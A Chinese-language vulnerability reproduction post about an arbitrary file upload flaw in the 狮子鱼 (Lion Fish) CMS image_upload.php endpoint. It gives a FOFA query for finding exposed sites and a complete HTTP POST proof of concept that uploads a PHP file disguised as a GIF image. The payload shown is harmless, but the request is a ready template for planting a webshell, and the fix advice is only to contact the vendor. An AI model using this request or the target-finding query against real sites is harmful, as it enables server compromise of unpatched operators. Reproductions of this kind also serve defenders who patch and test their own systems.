【漏洞复现】狮子鱼CMS文件上传漏洞(image_upload.php)

Nx01 产品简介

狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。

Nx02 漏洞描述

狮子鱼CMS image_upload.php文件存在任意文件上传漏洞,攻击者可能利用这个漏洞上传恶意文件并执行恶意代码。

Nx03 产品主页

fofa-query: body="/seller.php?s=/Public/login"

Nx04 漏洞复现

POC:

复制代码
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjGdyeoVHUBbniBlK

------WebKitFormBoundaryjGdyeoVHUBbniBlK
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif

<?php echo 'hello'?>
------WebKitFormBoundaryjGdyeoVHUBbniBlK--

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
驭渊的小故事2 小时前
网络原理01(两千字解析)
网络
doiito2 小时前
【Web安全,微服务安全】HashiCorp Vault 项目深度分析报告
安全·微服务
一拳一个娘娘腔3 小时前
第八期:实战演练 —— 构建一个完整的攻击链(模拟)
安全
星幻元宇VR3 小时前
公共安全实训展厅设备【人防知识学习系统】
科技·学习·安全
想你依然心痛3 小时前
嵌入式Linux安全加固:SELinux、Capabilities与Seccomp——强制访问控制与沙箱
linux·运维·安全
HackTwoHub4 小时前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
KaMeidebaby4 小时前
卡梅德生物技术快报|小 RNA 适配体合成 + 多方法亲和力表征全流程标准化操作手册
前端·网络·数据库·人工智能·算法
MDM.Plus4 小时前
苹果MDM技术演进:从远程控制到设备信任体系的构建
运维·服务器·安全·ios·mdm·手机店
❀͜͡傀儡师5 小时前
2026年7月高危安全态势速览
安全
阿成学长_Cain6 小时前
Linux telinit 命令详解:运行级别切换|关机重启|系统维护一站式掌握
linux·运维·前端·网络